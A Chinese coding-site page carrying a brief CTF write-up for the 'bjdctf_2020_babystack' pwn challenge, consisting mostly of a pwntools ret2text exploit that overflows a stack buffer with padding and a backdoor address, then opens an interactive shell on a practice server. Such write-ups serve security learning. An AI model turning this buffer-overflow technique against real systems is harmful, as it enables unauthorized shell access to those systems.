码农公寓

    导航菜单
    • 网站首页
    • 编程语言
      • Java
      • PHP
      • C/C++
      • IOS
      • Android
      • C#
      • VB
      • C语言
      • R语言
      • 易语言
      • css
      • html
      • js
      • JavaScript
      • jQuery
      • Swift
      • ASP.NET
      • ASP
      • 正则表达式
      • vb.net
      • Golang
      • bat
      • VBA
      • PowerShell
      • Erlang
      • autoit
      • VBS
      • perl
      • Lua
      • Dos
      • Ruby
    • 数据库
      • Mysql
      • Sql Server
      • Oracle
      • Sqlite
      • MongoDB
      • Mssql
      • Redis
      • Access
      • mariadb
      • DB2
      • PostgreSQL
    • 服务器知识
      • 云服务器
      • 虚拟主机
      • WEB服务器
      • DNS服务器
      • Nginx
      • Tomcat
      • IIS
      • FTP服务器
      • 服务器其它
      • 服务器安全
      • 邮件服务器
      • 虚拟服务器
    • 系统相关
      • Linux
      • Ubuntu
      • Centos
      • Windows10
      • Windows7
      • Bios
      • Fedora
      • Windows11
      • Solaris
      • windows server
      • 注册表
      • 系统进程
    • 设计相关
    • 文章分享
    首页文章分享

    pwn | bjdctf_2020_babystack

    2023-12-17 20:30:27

    bjdctf_2020_babystack

    ret2text

    exp:

    from pwn import *
import time 

context.log_level = 'debug'

sh = remote('node4.buuoj.cn', 27865)

p_backdoor = 0x00000000004006E6



sh.recv()

sh.send(b'100\n')

sh.recv()


payload = 0x18 * b'm' + p64(p_backdoor)

sh.sendline(payload)

sh.interactive()

sh.close()
    上一篇:多进程/线程select同一文件问题


    下一篇:“photo wake-up”创新项目实训第一周总结

    相关文章

    • 12-17get_started_3dsctf_2016-Pwn
    • 12-17[PWN][进阶篇]Rop-Ret2Text介绍及实例教学
    • 12-17040-gwctf_2019_jiandan_pwn1
    • 12-17CSAW CTF 2016 PWN quals-warmup
    • 12-17buuctf pwn1_sctf_2016
    • 12-17sctf - pwn200(总结版)
    • 12-17CG CTF PWN When did you born?
    • 12-17hackme pwn toomuch2 [buffer overflow + ROPx86]
    • 12-17PWN菜鸡入门之栈溢出 (2)—— ret2libc与动态链接库的关系
    • 12-17Pwn-pwn-200

    文章分享最新文章

  • Office 365 小技巧:Teams的日程安排助理
  • 【ETHMM】以太坊钱包_ETH钱包_以太坊冷钱包_ETH冷钱包
  • 洛达AirPods鉴别检测工具AB153x_UT,支持1562a 1562f
  • How is SCM product maintenance tcode redirecting access to MARA
  • feign.FeignException: status 401 reading XXXXXX
  • less基本用法
  • 币安链BSC插件钱包指南
  • 如何在HBuilder中运行npm命令
  • 文件上传inputstream转为multipartfile
  • 安装jenkins时出现 No such plugin: cloudbees-folder的解决办法
    • 
    • 更多编程技术文章
    • 网站地图

    本站所有资源皆搜集自网络,相关版权归版权持有人所有,如有侵权,请电邮告之,本站会尽快删除。

    粤ICP备2022053706号

    "